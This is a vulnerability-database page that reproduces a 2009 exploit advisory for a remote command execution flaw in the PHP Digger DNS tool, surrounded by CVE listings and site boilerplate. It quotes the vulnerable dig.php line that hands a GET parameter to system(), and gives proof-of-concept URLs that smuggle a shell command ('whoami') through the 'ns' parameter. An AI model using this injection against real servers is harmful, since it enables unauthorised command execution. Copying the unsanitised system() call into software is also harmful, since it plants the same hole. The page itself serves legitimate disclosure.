Lucene search
+L

DNS Tools (PHP Digger) - Remote Command Execution

🗓️ 16 Apr 2009 00:00:00Reported by SirGodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

DNS Tools Remote Command Execution vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1361
16 Apr 200900:00
circl
Circl
CVE-2009-1916
16 Apr 200900:00
circl
CVE
CVE-2009-1361
22 Apr 200918:00
cve
CVE
CVE-2009-1916
4 Jun 200917:00
cve
Cvelist
CVE-2009-1361
22 Apr 200918:00
cvelist
Cvelist
CVE-2009-1916
4 Jun 200917:00
cvelist
EUVD
EUVD-2009-1359
7 Oct 202500:30
euvd
EUVD
EUVD-2009-1911
7 Oct 202500:30
euvd
Tenable Nessus
Fedora 12 : xinha-0.96.1-1.fc12 (2010-9260)
1 Jul 201000:00
nessus
Tenable Nessus
Fedora 13 : xinha-0.96.1-2.fc13 (2010-9320)
1 Jul 201000:00
nessus
Rows per page
############################################################################################
[+] DNS Tools (PHP Digger) Remote Command Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
############################################################################################

[+] Remote Command Execution

 - Vulnerable code in dig.php

------------------------------------------
$ns  = $_GET['ns'];

 system ("dig @$ns $host $query_type");
------------------------------------------

We can execute commands via "ns" variable.Just use || before and after
the command.

 PoC :

  http://127.0.0.1/dig.php?ns=||COMMAND HERE||&host=mortal-team.net&query_type=NS&status=digging

 Example :

  http://127.0.0.1/dig.php?ns=||whoami||&host=mortal-team.net&query_type=NS&status=digging

############################################################################################

# milw0rm.com [2009-04-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.10304
31